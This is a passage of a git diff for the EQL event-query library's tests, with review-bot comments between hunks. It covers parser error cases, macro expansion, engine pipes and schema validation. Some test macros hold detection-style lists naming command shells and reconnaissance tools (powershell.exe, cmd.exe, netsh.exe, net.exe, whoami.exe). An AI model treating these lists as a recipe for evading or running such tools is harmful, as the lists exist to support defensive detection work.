+ 'process where process_name == "abc.exe" garbage extraneous \"input\"', + 'garbage process where process_name < "abc.e"xe"', + 'process', + 'process where abc == "extra"quote"', + 'file where and', + 'file where file_name and', + 'file_name and', + 'file_name )', + 'file_name (\r\n\r\n', + 'file_name where (\r\n\r\n)', + 'process where _badSymbol == 100', + 'process where 1field == 2field', + 'sequence where 1field == 2field', + 'process where true | filter', + 'process where true | badPipe', + 'process where true | badPipe a b c', + 'process where true | head -100', + 'process where descendant of []', + 'file where nothing of [process where true]', + 'file where DescenDant of [process where true]', + 'garbage', + 'process where process_name == "abc.exe" | count 100', + 'process where process_name == "abc.exe" | unique 100', + 'process where process_name == "abc.exe" | sort 100', + 'process where process_name == "abc.exe" | head 100 abc', + 'process where process_name == "abc.exe" | head abc', + 'process where process_name == "abc.exe" | head abc()', + 'process where process_name == "abc.exe" | head abc(def, ghi)', + 'process where process_name == "abc.exe" | window abc', + 'process where process_name == "abc.exe" | window 10g', + 'sequence [process where pid == pid]', + 'sequence [process where pid == pid] []', + 'sequence with maxspan=false [process where true] [process where true]', + 'sequence with maxspan=10g [process where true] [process where true]', + 'sequence with badparam=100 [process where true] [process where true]', + # check that the same number of BYs are in every subquery + 'sequence [file where true] [process where true] by field1', + 'sequence [file where true] by field [file where true] by field1 until [file where true]', + 'sequence by a,b,c [file where true] by field [file where true] by field1 until [file where true]', + 'sequence [file where 1] by field [file where 1] by f1 until [file where 1] by f1,f2 | unique field', + 'sequence 
[process where 1] fork=true [network where 1]', + 'sequence [process where 1] [network where 1] badparam=true', + 'sequence [process where 1] [network where 1] fork=true fork=true', + 'sequence [process where 1] [network where 1] fork fork', + 'process where descendant of [file where true] bad=param', + '| filter true' + ] + for query in invalid: + self.assertRaises(EqlParseError, parse_query, query) + + def test_query_events(self): + """Test that event queries work with events[n].* syntax in pipes.""" + base_queries = ['abc', 'abc[123]', 'abc.def.ghi', 'abc.def[123].ghi[456]'] + for text in base_queries: + field_query = parse_expression(text) # type: Field + events_query = parse_expression('events[0].' + text) # type: Field + + index, query = field_query.query_multiple_events() + self.assertEqual(index, 0, "Didn't query from first event") + self.assertEqual(query, field_query, "Didn't unconvert query") + + index, query = events_query.query_multiple_events() + self.assertEqual(index, 0, "Didn't query from first event") + self.assertEqual(query, field_query, "Didn't unconvert query") + + for event_index, text in enumerate(base_queries): + events_text = 'events[{}].{}'.format(event_index, text) + field_query = parse_expression(text) # type: Field + events_query = parse_expression(events_text) # type: Field + index, query = events_query.query_multiple_events() + self.assertEqual(index, event_index, "Didn't query from {} event".format(event_index)) + self.assertEqual(query, field_query, "Didn't unconvert query") + + def test_comments(self): + """Test that comments are valid syntax but stripped from AST.""" + match = parse_query("process where pid=4 and ppid=0") + + query = parse_query("""process where pid = 4 /* multi\nline\ncomment */ and ppid=0""") + self.assertEqual(match, query) + + query = parse_query("""process where pid = 4 // something \n and ppid=0""") + self.assertEqual(match, query) + + query = parse_query("""process where pid + = 4 and ppid=0 + """) + 
self.assertEqual(match, query) + + query = parse_query("""process where + // test + // + //line + //comments + pid = 4 and ppid = 0 + """) + self.assertEqual(match, query) + + match = parse_expression("true") + query = parse_expression("true // something else \r\n /* test\r\n something \r\n*/") + self.assertEqual(match, query) + + commented = parse_definitions("macro test() pid = 4 and /* comment */ ppid = 0") + macro = parse_definitions("macro test() pid = 4 and ppid = 0") + self.assertEqual(commented, macro) + + def test_invalid_comments(self): + """Test that invalid/overlapping comments fail.""" + query_text = "process where /* something */ else */ true" + self.assertRaises(EqlParseError, parse_query, query_text) + + # Test nested comments (not supported) + query_text = "process where /* outer /* nested */ outer */ true" + self.assertRaises(EqlParseError, parse_query, query_text) + + query_text = "process where // true" + self.assertRaises(EqlParseError, parse_query, query_text) diff --git a/tests/test_preprocessor.py b/tests/test_preprocessor.py new file mode 100644 index 0000000..e87ac55 --- /dev/null +++ b/tests/test_preprocessor.py 
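Review bot: The failure handler in test_valid_queries calls `traceback.print_exc(ex)`, which passes the exception object as print_exc's `limit` argument; on Python 3 the `limit >= 0` comparison inside traceback raises a TypeError, so a parse failure would surface as a TypeError from the handler rather than the intended `self.fail(...)` message. The `sys.exc_info()` unpacking is not needed either: `except (EqlSyntaxError, EqlSemanticError):` followed by `traceback.print_exc()` and the existing `self.fail("Unable to parse query #{}: {}".format(i, text))` prints the same traceback. The bare `datetime.datetime.now()` call before the loop has no effect and can be dropped, and `self.assertEquals` is the deprecated alias of `assertEqual` (removed in Python 3.12). test_parse_literal's docstring and its `self.assertRaises(EqlParseError, parse_field, "and")` line look copied from test_parse_field; the docstring should say literals and that assertion presumably meant `parse_literal`. The `eval(actual_repr)` round-trip is acceptable here because the inputs are the test's own literals, but a one-line comment saying so, e.g. `# eval() is safe here: the repr comes from our own parsed literals`, would keep the pattern from being copied into code that handles user-supplied queries.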
@@ -0,0 +1,229 @@ +"""Tests for the EQL preprocessor.""" +import os +import unittest +from collections import OrderedDict + +from eql.ast import * # noqa: F403 +from eql.parser import * # noqa: F403 +from eql.transpilers import TextEngine +from eql import EqlTypeMismatchError + + +class TestPreProcessor(unittest.TestCase): + """Tests for the EQL PreProcessor.""" + + macro_definitions = """ + macro A_OR_B(a,b) + a or b + + macro XOR(a,b) + A_OR_B(a and not b, b and not a) + + macro IN_GRAYLIST(proc) + proc in ( + "msbuild.exe", + "powershell.exe", + "cmd.exe", + "netsh.exe" + ) + + macro PROCESS_IN_GRAYLIST() + IN_GRAYLIST(process_name) + + macro PARENT_XOR_CHILD_IN_GRAYLIST() + XOR(IN_GRAYLIST(process_name), IN_GRAYLIST(parent_process_name)) + + macro DESCENDANT_OF_PROC(expr) + descendant of [process where opcode==1 and expr] + """ + + def test_parse_with_preprocessor(self): + """Test that preprocessor works with the parser.""" + preprocessor = get_preprocessor(""" + const ABC = 123 + const DEF = 456 + const GHI = 123 + + macro COMPARE_TWO(a, b) a == b + macro GET_TRUE(a) COMPARE_TWO(a, a) + macro IS_123(a) a == ABC + """) + + def p(text): + return parse_expression(text, preprocessor=preprocessor) + + self.assertEqual(p('ABC'), Number(123)) + self.assertEqual(p('COMPARE_TWO(some_field, "abc.exe")'), p('some_field == "abc.exe"')) + self.assertEqual(p('COMPARE_TWO(105, 105)'), Boolean(True)) + self.assertEqual(p('GET_TRUE(100)'), Boolean(True)) + self.assertEqual(p('IS_123(456)'), Boolean(False)) + self.assertEqual(p('IS_123(123)'), Boolean(True)) + + # now double up + double_pp = get_preprocessor(""" + macro TRUE() GET_TRUE(105) + macro FALSE() not TRUE() + """, preprocessor=preprocessor) + + def pp(text): + return parse_expression(text, preprocessor=double_pp) + + self.assertEqual(pp('ABC'), Number(123)) + self.assertEqual(pp('TRUE()'), Boolean(True)) + self.assertEqual(pp('FALSE()'), Boolean(False)) + self.assertEqual(pp('not FALSE()'), Boolean(True)) + + def 
test_preprocessor_type_hints(self): + """Test that type hints are correct for when parsing with a preprocessor.""" + preprocessor = get_preprocessor(""" + macro ENUM_COMMAND(name) + name in ("net.exe", "whoami.exe", "hostname.exe") + macro CONSTANT() 1 + """) + + with preprocessor: + parse_query("process where ENUM_COMMAND(process_name)") + parse_query("process where true | filter ENUM_COMMAND(process_name)") + parse_query("process where true | unique ENUM_COMMAND(process_name)") + parse_query("process where true | filter CONSTANT()") + + # unique requires a dynamic type, but there are no fields in CONSTANT + with self.assertRaisesRegexp(EqlTypeMismatchError, "Expected dynamic boolean/number/string"): + parse_query("process where true | unique CONSTANT()") + + def test_macro_expansion(self): + """Test EQL custom macros.""" + expanded = { + "A_OR_B": "a or b", + "XOR": "(a and not b) or (b and not a)", + "IN_GRAYLIST": 'proc in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")', + "PROCESS_IN_GRAYLIST": 'process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")', + "PARENT_XOR_CHILD_IN_GRAYLIST": ( + '( ' + ' process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe") and not ' + ' parent_process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")' + ') or (' + ' parent_process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe") and not ' + ' process_name in ("msbuild.exe", "powershell.exe", "cmd.exe", "netsh.exe")' + ')' + ), + 'DESCENDANT_OF_PROC': 'descendant of [process where opcode == 1 and expr]' + } + + macros = parse_definitions(self.macro_definitions) + lookup = OrderedDict() + + with ignore_missing_functions: + for macro in macros: + lookup[macro.name] = macro + rendered = macro.render() + macro_copy = parse_definition(rendered) + self.assertEqual(macro, macro_copy) + self.assertEqual(rendered, macro_copy.render(), "Macro doesn't render valid EQL.") + + # Now load up each macro to the engine 
+ engine = PreProcessor(macros) + + # Confirm that nested macros are expanded appropriately + for name, macro in engine.macros.items(): + expected_expr = parse_expression(expanded[name]) + self.assertEqual(macro.expression, expected_expr) + self.assertEqual(macro.expression.render(), expected_expr.render()) + + # Expand some EQL queries + queries = [ + ('process where DESCENDANT_OF_PROC(process_name="explorer.exe")', + 'process where descendant of [process where opcode=1 and process_name == "explorer.exe"]' + ), + ('process where XOR(a=="b", c=="d")', + 'process where ((a == "b") and not (c == "d")) or ((c == "d") and not (a == "b"))' + ), + ('file where true', + 'file where true', + ), + ('process where opcode=1 and PROCESS_IN_GRAYLIST()', + 'process where opcode==1 and process_name in ("msbuild.exe","powershell.exe","cmd.exe","netsh.exe")' + ), + ] + + for query, expanded_query in queries: + before_node = parse_query(query) + actual = engine.expand(before_node) + expected = parse_query(expanded_query) + + # Test that eval + repr works + actual_repr = repr(actual) + eval_actual = eval(actual_repr) + + self.assertEqual(actual, expected) + self.assertEqual(eval_actual, actual) + self.assertTrue(actual == expected) + self.assertFalse(actual != expected) + error_msg = "'{}' expanded to '{}' instead of '{}'".format(query, actual.render(), expected.render()) + self.assertEqual(actual.render(), expected.render(), error_msg) + + query = parse_expression("DESCENDANT_OF_PROC()") + self.assertRaisesRegexp(ValueError, "Macro .+ expected \d+ arguments .*", engine.expand, query) + + query = parse_expression("DESCENDANT_OF_PROC(1,2,3)") + self.assertRaisesRegexp(ValueError, "Macro .+ expected \d+ arguments .*", engine.expand, query) + + def test_custom_macro(self): + """Test python custom macro expansion.""" + def optimize_length(args): + arg, = args # only 1 allowed + if isinstance(arg, String): + return Number(len(arg.value)) + else: + return FunctionCall('length', [arg]) + + 
macro = CustomMacro('LENGTH', optimize_length) + engine = PreProcessor([macro]) + + with ignore_missing_functions: + example = parse_query('process where LENGTH("python.exe") == LENGTH(process_name)') + expected = parse_query('process where 10 == length(process_name)') + + output = engine.expand(example) + self.assertEqual(output, expected, "Custom macro LENGTH was not properly expanded") + + with ignore_missing_functions: + example = parse_query('process where LENGTH("abc", "def")') + + self.assertRaisesRegexp(ValueError, "too many values to unpack", engine.expand, example) + + def test_load_definitions_from_file(self): + """Test loading definitions from a file.""" + filename = 'example-definitions.eql.tmp' + config = {'definitions_files': [filename]} + with open(filename, 'w') as f: + f.write(self.macro_definitions) + engine = TextEngine(config) + os.remove(filename) + self.assertGreater(len(engine.preprocessor.macros), 0, "Definitions failed to load") + + def test_mixed_definitions(self): + """Test that macro and constant definitions can be loaded correctly.""" + defn = parse_definitions(""" + const magic = 100 + macro OR(a, b) a or b + """) + pp = PreProcessor(defn) + + # Confirm that copy and adding is working + pp2 = pp.copy() + pp.add_definition(parse_definition("macro ABC(a, b, c) error_error_error")) + pp2.add_definition(parse_definition("macro ABC(a, b, c) concat(a, magic, c)")) + + matches = [ + ("abc", "abc"), + ("OR(x, y)", "x or y"), + ("magic", "100"), + ("ABC(0,1,2)", "concat(0, 100, 2)"), + ] + + for before, after in matches: + with ignore_missing_functions: + before = parse_expression(before) + after = parse_expression(after) + self.assertEqual(pp2.expand(before), after) diff --git a/tests/test_python_engine.py b/tests/test_python_engine.py index 626641e..c59ba53 100644 --- a/tests/test_python_engine.py +++ b/tests/test_python_engine.py 
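Review bot: test_load_definitions_from_file writes `example-definitions.eql.tmp` into the current working directory and only removes it after `TextEngine(config)` returns, so a failing constructor leaves the file behind, and a fixed name in the working directory can collide if the suite runs in parallel. Registering the removal before the engine is built, `self.addCleanup(os.remove, filename)` right after the `with open(...)` block (and deleting the later `os.remove(filename)`), makes the cleanup unconditional; `tempfile.NamedTemporaryFile(delete=False)` would additionally give a unique name. In test_macro_expansion the regex strings passed to `assertRaisesRegexp` contain `\d` inside non-raw literals, which Python 3 treats as an invalid escape sequence (a DeprecationWarning slated to become an error), so they should be written as `r"Macro .+ expected \d+ arguments .*"`. `assertRaisesRegexp` itself is the deprecated alias of `assertRaisesRegex`, and test_preprocessor_type_hints and test_custom_macro use it too.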
@@ -3,12 +3,12 @@ import uuid
 from collections import defaultdict
-from eql.engines.base import Event, AnalyticOutput, DEFAULT_TIME_UNIT
-from eql.engines.build import get_reducer, get_engine, get_post_processor
-from eql.engines.native import PythonEngine
-from eql.parser import parse_query, parse_analytic
+from eql import * # noqa: F403
+from eql.ast import * # noqa: F403
+from eql.parser import ignore_missing_functions
+from eql.functions import Wildcard, Match
 from eql.schema import EVENT_TYPE_GENERIC
-from .base import TestEngine
+from eql.tests.base import TestEngine
 class TestPythonEngine(TestEngine):
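Review bot: The new import block replaces four explicit imports with `from eql import *` and `from eql.ast import *`, so names the old lines imported by name (`parse_query`, `parse_analytic`, among others) now resolve implicitly, and `# noqa: F403` switches off the only lint that would flag it. Listing what the module actually uses, e.g. `from eql.parser import ignore_missing_functions, parse_query, parse_analytic`, keeps name resolution checkable and avoids one star import silently shadowing a name from the other. `Wildcard` and `Match` are imported from `eql.functions` but do not appear in any hunk of this file shown here; if they are unused elsewhere in the module, that import should go as well.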
@@ -104,29 +104,32 @@ def test_engine_load(self): 'process where 1==1 | count process_name | filter percent > 0.5', 'process where a > 100000000000000000000000000000000', ] - for query in queries: - # Make sure every query can be converted without raising any exceptions - parsed_query = parse_query(query) - engine.add_query(parsed_query) - # Also try to load it as an analytic - parsed_analytic = parse_analytic({'metadata': {'id': uuid.uuid4()}, 'query': query}) - engine.add_analytic(parsed_analytic) + with ignore_missing_functions: + for query in queries: + # Make sure every query can be converted without raising any exceptions + parsed_query = parse_query(query) + engine.add_query(parsed_query) + + # Also try to load it as an analytic + parsed_analytic = parse_analytic({'metadata': {'id': uuid.uuid4()}, 'query': query}) + engine.add_analytic(parsed_analytic) def test_raises_errors(self): """Confirm that exceptions are raised when expected.""" queries = [ # ('process where bad_field.sub_field == 100', AttributeError), - ('process where length(0)', TypeError), + # ('process where length(0)', TypeError), # ('file where file_name.abc', AttributeError), # ('file where pid.something', AttributeError), ('registry where invalidFunction(pid, ppid)', KeyError), ] # Make sure that these all work as expected queries - for query, expected_error in queries: - parsed_query = parse_query(query) - self.assertRaises(expected_error, self.get_output, queries=[parsed_query]) + with ignore_missing_functions: + for query, expected_error in queries: + parsed_query = parse_query(query) + self.assertRaises(expected_error, self.get_output, queries=[parsed_query]) def test_query_output(self): """Confirm that the known queries and data return expected output.""" 
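Review bot: In test_raises_errors the `('process where length(0)', TypeError)` case is commented out rather than removed or replaced, leaving `KeyError` for `invalidFunction` as the only live assertion and no record of why `length(0)` no longer raises at the engine. If argument type checking now rejects it earlier (the hunk does not show where), that deserves its own assertion, for example `self.assertRaises(EqlTypeMismatchError, parse_query, 'process where length(0)')`; otherwise a one-line comment such as `# length(0) no longer reaches the engine; see parser type checks` would stop the list from accumulating dead entries. test_engine_load's body starts before this hunk.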
@@ -348,71 +351,6 @@ def test_special_pipes(self): sorted_results = list(sorted(results, key=lambda e: (e.data['count'], e.data['key']))) self.assertListEqual(sorted_results, results, "Count didn't output expected results") - def test_window_pipe(self): - def convert_time(seconds): - return int(float(seconds) * DEFAULT_TIME_UNIT) - - config = {'flatten': True} - events = [Event.from_data(d) for d in [ - { - "event_type": "process", - "process_name": "a", - "timestamp": convert_time(0) - }, - { - "event_type": "process", - "process_name": "b", - "timestamp": convert_time(1) - }, - { - "event_type": "process", - "process_name": "b", - "timestamp": convert_time(10.1) - }, - { - "event_type": "process", - "process_name": "c", - "timestamp": convert_time(11.1) - }, - { - "event_type": "process", - "process_name": "c", - "timestamp": convert_time(12) - }, - { - "event_type": "process", - "process_name": "d", - "timestamp": convert_time(13) - }, - { - "event_type": "process", - "process_name": "e", - "timestamp": convert_time(20.2) - }, - { - "event_type": "process", - "process_name": "a", - "timestamp": convert_time(31) - } - ]] - - ''' - 0: [a] - 1: [a,b] - 10.1: [b] - 11.1: [b,c] - 12: [b,c,c] - 13: [b,c,c,d] - 20.2: [c,c,d,e] - 31: [a] - ''' - - query = 'process where true | window 10s | unique hostname, process_name | unique_count hostname | filter count > 1' - results = self.get_output(queries=[parse_query(query)], config=config, events=events) - self.assertGreater(len(results), 1, "Window pipe returned no results") - self.assertListEqual([event.data['process_name'] for event in results], ['b', 'c', 'c', 'd', 'e'], "Window didn't output expected results.") - self.assertListEqual([event.data['count'] for event in results], [2, 2, 2, 3, 3], "Window didn't output expected results.") - @staticmethod def _custom_echo(x): return x 
@@ -424,15 +362,17 @@ def _custom_reverse(x): def test_custom_functions(self): """Custom functions in python.""" config = {'flatten': True} - query = "process where echo(process_name) == \"SvcHost.*\" and command_line == \"* -k *NetworkRes*d\"" - output = self.get_output(queries=[parse_query(query)], config=config) - event_ids = [event.data['serial_event_id'] for event in output] - self.validate_results(event_ids, [15, 16, 25], "Custom function 'echo' failed") - query = "process where length(user_domain)>0 and reverse(echo(user_domain)) = \"YTIROHTUA TN\" | tail 3" - output = self.get_output(queries=[parse_query(query)], config=config) - event_ids = [event.data['serial_event_id'] for event in output] - self.validate_results(event_ids, [43, 45, 52], "Custom function 'reverse'") + with ignore_missing_functions: + query = "process where echo(process_name) == 'SvcHost.*' and command_line == '* -k *NetworkRes*d'" + output = self.get_output(queries=[parse_query(query)], config=config) + event_ids = [event.data['serial_event_id'] for event in output] + self.validate_results(event_ids, [15, 16, 25], "Custom function 'echo' failed") + + query = "process where length(user_domain)>0 and reverse(echo(user_domain)) = \"YTIROHTUA TN\" | tail 3" + output = self.get_output(queries=[parse_query(query)], config=config) + event_ids = [event.data['serial_event_id'] for event in output] + self.validate_results(event_ids, [43, 45, 52], "Custom function 'reverse'") def test_analytic_output(self): """Confirm that analytics return the same results as queries.""" 
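Review bot: The two queries in test_custom_functions now use different quoting styles: the first was rewritten to single-quoted EQL strings (`'SvcHost.*'`, `'* -k *NetworkRes*d'`) while the second still carries the escaped form `\"YTIROHTUA TN\"`. Since dropping the escaping seems to be the point of the rewrite, the second line should follow: `query = "process where length(user_domain)>0 and reverse(echo(user_domain)) = 'YTIROHTUA TN' | tail 3"`. Both forms are presumably accepted by the parser, so this is a consistency point only.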
@@ -457,6 +397,40 @@ def add_analytic_output(output): # type: (AnalyticOutput) -> None actual_ids = output_ids[analytic.id] self.validate_results(actual_ids, expected_ids, query) + def test_engine_schema(self): + """Test loading the engine with a custom schema.""" + queries = [ + 'movie where name == "*Breakfast*" and IN_80s(release)', + 'person where name == "John Hughes"', + ] + + analytic_dicts = [{'query': q} for q in queries] + definitions = """ + macro IN_80s(date) date == "*/*/1980" + """ + + config = { + 'schema': { + 'events': { + 'movie': {'name': 'string', 'release': 'string'}, 'person': {} + } + }, + 'definitions': parse_definitions(definitions), + 'analytics': analytic_dicts + } + + pp = PreProcessor() + pp.add_definitions(config['definitions']) + + with Schema(**config['schema']): + expected = [parse_analytic(d, preprocessor=pp) for d in analytic_dicts] + + engine = BaseEngine(config) + with engine: + engine.add_analytics([parse_analytic(d) for d in analytic_dicts]) + + self.assertListEqual(engine.analytics, expected, "Analytics were not loaded and expanded properly.") + def test_relationship_pid_collision(self): """Confirm that the field used for tracking lineage can be dynamically set.""" config = {'flatten': True, 'pid_key': 'unique_pid', 'ppid_key': 'unique_ppid'} 
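Review bot: In test_engine_schema the final `engine.add_analytics([parse_analytic(d) for d in analytic_dicts])` runs outside the `with Schema(**config['schema']):` block, so the test only passes if entering `BaseEngine` installs the schema and definitions from `config` itself; that is the behaviour under test, but nothing in the hunk says so. A comment on that line, `# parsed inside the engine context only: the engine must apply its own schema and definitions`, would stop a future edit from "fixing" it by wrapping the call in the Schema context and silently removing the check. The macro name `IN_80s` is also misleading for a pattern of `"*/*/1980"`, which matches one year; since the assertion compares expanded ASTs the value is irrelevant, but `"*/*/198*"` or a name like `IN_1980` would avoid the confusion.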
@@ -521,3 +495,67 @@ def test_relationship_pid_collision(self): output = self.get_output(queries=[parse_query(query)], config=config, events=events) event_ids = [event.data['unique_pid'] for event in output] self.validate_results(event_ids, ['host1-1003'], "Relationships failed due to pid collision") + + def test_mutli_line_functions(self): + """Test wildcard and match functions.""" + sources = [ + "this is a single line comment", + """This is + a multiline + comment""", + "this\nis\nalso\na\nmultiline\ncomment" + ] + + for source in sources: + self.assertTrue(Match.run(source, ".*comment")) + # \n newlines must match on \n \s etc. but won't match on " " + self.assertTrue(Match.run(source, ".*this\sis\s.*comment")) + self.assertTrue(Match.run(source, "t.+a.+c.+")) + self.assertFalse(Match.run(source, "MiSsInG")) + + for source in sources: + self.assertTrue(Wildcard.run(source, "*comment")) + self.assertTrue(Wildcard.run(source, "this*is*comment")) + self.assertTrue(Wildcard.run(source, "t*a*c*")) + self.assertFalse(Wildcard.run(source, "MiSsInG")) + + def test_pipes_reset_state(self): + """Test that the pipes are clearing their state after receiving PIPE_EOF""" + events = self.get_events() + + queries = [ + 'process where true | unique opcode', + 'process where true | unique_count opcode', + 'process where true | unique_count', + 'process where true | count', + 'process where true | count opcode', + 'process where true | head 1', + 'process where true | tail', + 'process where true | sort opcode', + 'process where true | window 10s', + 'process where true | window 5m | head 1', + ] + + for query in queries: + engine = PythonEngine() + + results = [] # type: list[Event] + engine.add_output_hook(results.append) + engine.add_queries([parse_query(query)]) + + engine.stream_events(events) + engine.finalize() + expected_len = len(results) + + results.clear() + + engine.stream_events(events) + engine.finalize() + actual_len = len(results) + + self.assertEquals( + 
expected_len, + actual_len, + f"Expected results to be same when streaming events multiple times {query}" + ) + diff --git a/tests/test_queries.json b/tests/test_queries.json deleted file mode 100644 index fe51488..0000000 --- a/tests/test_queries.json +++ /dev/null @@ -1 +0,0 @@ -[] diff --git a/tests/test_schema.py b/tests/test_schema.py new file mode 100644 index 0000000..2ec6ac6 --- /dev/null +++ b/tests/test_schema.py 
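Review bot: test_pipes_reset_state only compares `len(results)` between the two passes, which cannot detect the failure mode this series is fixing for `count`, `unique_count` and `window`: a pipe that keeps stale totals or buffered events across PIPE_EOF can emit the same number of events with different `count` values or different keys. Capture the first pass as `expected = [e.data for e in results]` and on the second pass assert `self.assertEqual(expected, [e.data for e in results], "...")` so the payload is pinned, not just the count. `results.clear()` and the f-string message are Python 3 only, which matters if the package still supports 2.7 (the wheel filename in the notebook hunk later on this page is tagged py2.py3) — `del results[:]` and `str.format` are the portable forms — and `self.assertEquals` is a deprecated alias of `assertEqual`. In test_mutli_line_functions the pattern `".*this\sis\s.*comment"` is a non-raw string, so it only works because Python currently passes the unknown `\s` escape through; writing it as `r".*this\sis\s.*comment"` avoids the invalid-escape DeprecationWarning. The method name `test_mutli_line_functions` also has a typo (`mutli` for `multi`).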
@@ -0,0 +1,231 @@ +"""Test case.""" +import unittest + +from eql.events import Event +from eql.errors import EqlSchemaError, EqlTypeMismatchError +from eql.parser import parse_query, strict_field_schema, allow_enum_fields +from eql.schema import Schema, MIXED_TYPES as MIXED +from eql.types import BASE_STRING as STR, BASE_NUMBER as NUM, BASE_BOOLEAN as BOOL + + +class TestSchemaValidation(unittest.TestCase): + """Tests for schema lookups and type system.""" + + schema = { + "process": { + "command_line": STR, + "process_name": STR, + "pid": NUM, + "elevated": BOOL + + }, + "file": { + "file_path": STR, + "file_name": STR, + "process_name": NUM, + "pid": NUM, + "data": MIXED, + }, + "complex": { + "string_arr": [STR], + "wideopen": {}, + "nested": { + "arr": [MIXED], + "double_nested": { + "nn": NUM, "triplenest": {"m": MIXED, "b": BOOL} + }, + "num": NUM + }, + "objarray": [{}], + } + } + + def test_valid_schema_event(self): + """Test that schema errors are being raised separately.""" + valid = [ + 'process where true', + 'file where true', + 'complex where true', + 'any where true', + 'generic where true' + ] + + with Schema(self.schema, allow_generic=True, allow_any=True): + for query in valid: + parse_query(query) + + def test_invalid_schema_event(self): + """Test that schema errors are being raised separately.""" + invalid = [ + 'PROCESS where true', + 'network where true', + 'person where true', + 'generic where true', + 'any where true' + ] + + with Schema(self.schema, allow_generic=False, allow_any=False): + for query in invalid: + self.assertRaises(EqlSchemaError, parse_query, query) + + def test_valid_schema_fields(self): + """Test that schema errors are being raised separately.""" + valid = [ + 'process where process_name == "test" and command_line == "test" and not pid', + 'file where file_path == "abc" and data == 1', + 'file where file_path == "abc" and data == "fdata.exe"', + 'file where file_path == "abc" and not data', + 'file where file_path == 
"abc" and length(data) | filter file_path == "abc"', + 'sequence [file where pid=1] [process where pid=2] | filter events[0].file_name = events[1].process_name', + 'sequence by pid [file where 1] [process where 1] | filter events[0].file_name = events[1].process_name', + 'join by pid [file where 1] [process where 1] | filter events[0].file_name = events[1].process_name', + + 'join [file where 1] by pid [process where 1] by pid until [complex where 0] by nested.num' + '| filter events[0].file_name = events[1].process_name', + + 'complex where string_arr[3]', + 'complex where wideopen.a.b[0].def == 1', + 'complex where nested.arr', + 'complex where nested.arr[0] == 1', + 'complex where nested.double_nested.nn == 5', + 'complex where nested.double_nested.triplenest', + 'complex where nested.double_nested.triplenest.m == 5', + 'complex where nested. double_nested.triplenest.b', + ] + + with Schema(self.schema): + for query in valid: + parse_query(query) + + def test_schema_enum_enabled(self): + """Test that enum fields are converted to string comparisons.""" + with Schema(self.schema), allow_enum_fields: + actual = parse_query("process where process_name.bash") + expected = parse_query("process where process_name == 'bash'") + self.assertEquals(actual, expected) + + def test_schema_enum_disabled(self): + """Test that enum errors are raised when not explicitly enabled.""" + with Schema(self.schema): + self.assertRaises(EqlSchemaError, parse_query, "process where process_name.bash") + + def test_invalid_schema_fields(self): + """Test that schema errors are being raised separately.""" + invalid = [ + 'process where not bad_field', + 'process where file_path', + 'file where command_line', + 'process where wideopen.a.b.c', + 'any where invalid_field', + 'complex where nested. 
double_nested.b', + 'file where file_path == "abc" and length(data) | unique missing_field == "abc"', + 'sequence [file where pid=1] [process where pid=2] | filter events[0].file_name = events[1].bad', + + 'sequence [file where 1] by pid [process where 1] by pid until [complex where 0] by pid' + '| unique events[0].file_name = events[1].process_name', + ] + with Schema(self.schema): + for query in invalid: + with self.assertRaises(EqlSchemaError): + parse_query(query) + + def test_array_functions(self): + """Test that array functions match array fields.""" + valid = [ + "complex where arrayContains(string_arr, 'thesearchstring')", + "complex where arrayContains(string_arr, 'thesearchstring', 'anothersearchstring')", + # this should pass until generics/templates are handled better + "complex where arrayContains(string_arr, 1)", + "complex where arrayContains(string_arr, 1, 2, 3)", + "complex where arraySearch(string_arr, x, x == '*subs*')", + "complex where arraySearch(objarray, x, x.key == 'k')", + "complex where arraySearch(objarray, x, arraySearch(x, y, y.key == true))", + "complex where arraySearch(nested.arr, x, x == '*subs*')", + "complex where arrayContains(objarray, 1)", + "complex where arrayContains(objarray, 1, 2, 3)", + ] + with Schema(self.schema): + for query in valid: + parse_query(query) + + def test_array_function_failures(self): + """Test that array functions fail on nested objects or the wrong type.""" + valid = [ + "process where arrayContains(pid, 4)", + "process where arraySearch(pid, x, true)", + "complex where arraySearch(objarray, '*subs*')", + ] + with Schema(self.schema): + for query in valid: + self.assertRaises(EqlTypeMismatchError, parse_query, query) + + def test_strict_schema(self): + """Check that fields can't be compared to null under strict schemas.""" + queries = [ + "process where command_line != null", + "process where elevated != null", + # explicit boolean checking + "process where process_name and command_line", + "process 
where 1 and 2", + "process where command_line", + ] + + with strict_field_schema, Schema(self.schema): + for query in queries: + self.assertRaises(EqlTypeMismatchError, parse_query, query) + + def test_count_schemas(self): + """Test that schemas are updated with counts in pipes.""" + queries = [ + "process where true | count | filter key == 'total' and percent < 0.5 and count > 0", + "process where true | unique_count process_name | filter count > 5 and process_name == '*.exe'", + "sequence[file where 1][process where 1] | unique_count events[0].process_name" + + " | filter count > 5 and events[1].elevated", + ] + + with Schema(self.schema): + for query in queries: + parse_query(query) + + def test_count_schema_failures(self): + """Test that schemas aren't overly updated with counts in pipes.""" + queries = [ + "process where true | count | filter key == 'total' and percent < 0.5 and count > 0 and elevated", + "process where true | unique_count process_name | filter key == '*.abc'" + + " and count > 5 and process_name == '*.exe'", + "sequence[file where 1][process where 1] | unique_count events[0].process_name" + + " | filter count > 5 and events[0].elevated", + ] + + with Schema(self.schema): + for query in queries: + print(query) + self.assertRaises(EqlSchemaError, parse_query, query) + + def test_merge_schema(self): + """Merge two schemas together.""" + a = Schema({"process": {"a": "string", "b": "number", "c": {}}}) + b = Schema({"process": {"c": "mixed"}, "file": {"path": "string"}}) + + # Test that schemas prefer keys from the first + c = a.merge(b) + self.assertDictEqual(c.schema, {"process": {"a": "string", "b": "number", "c": {}}, "file": {"path": "string"}}) + + def test_learn_schema(self): + """Test that schemas can be learned from a set of data.""" + data = [ + {"event_type": "process", "a": {"b": 1, "c": 2}, "d": "e"}, + {"event_type": "file", "a": "b", "cd": ["ef", 123]}, + {"event_type": "process", "a": {"b": 1, "c": "e"}}, + ] + event_schema = { + 
